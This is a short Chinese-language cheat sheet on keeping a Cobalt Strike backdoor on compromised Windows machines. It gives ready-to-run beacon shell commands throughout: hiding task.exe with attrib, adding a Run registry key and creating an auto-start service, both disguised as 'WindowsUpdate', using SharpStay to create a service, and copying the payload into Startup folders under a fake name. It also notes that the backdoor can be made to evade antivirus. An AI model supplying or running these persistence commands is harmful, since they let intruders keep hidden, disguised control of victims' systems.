cobaltstrike权限维持

1.注册表启动

注意：优先用这种方式来进行权限维持

task.exe是CS生成的后门文件，这里后门文件可以对其做免杀

隐藏文件

shell attrib C:\Windows\task.exe   +s +h

注册表启动后门文件

shell reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /t REG_SZ /d "C:\Windows\task.exe" /f

2.windows服务自动启动

隐藏文件

shell attrib C:\Windows\task.exe   +s +h

服务自动启动执行后门文件

shell sc create "WindowsUpdate"  binpath=  "cmd /c start C:\Windows\task.exe"

shell sc config "WindowsUpdate" start= auto

shell  net start "WindowsUpdate"

或者

3.SharpStay.exe 自动化任务启动

SharpStay.exe action=CreateService servicename=Debug command="C:\Windows\task.exe"

4.自动启动服务目录(win7系统才有效）

shell  copy  "C:\Windows\task.exe"   "C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.exe" /y

或者

copy  " C:\Windows\task.exe"   "%programdata%\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.exe" /y

shell  attrib "C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.exe" +s +h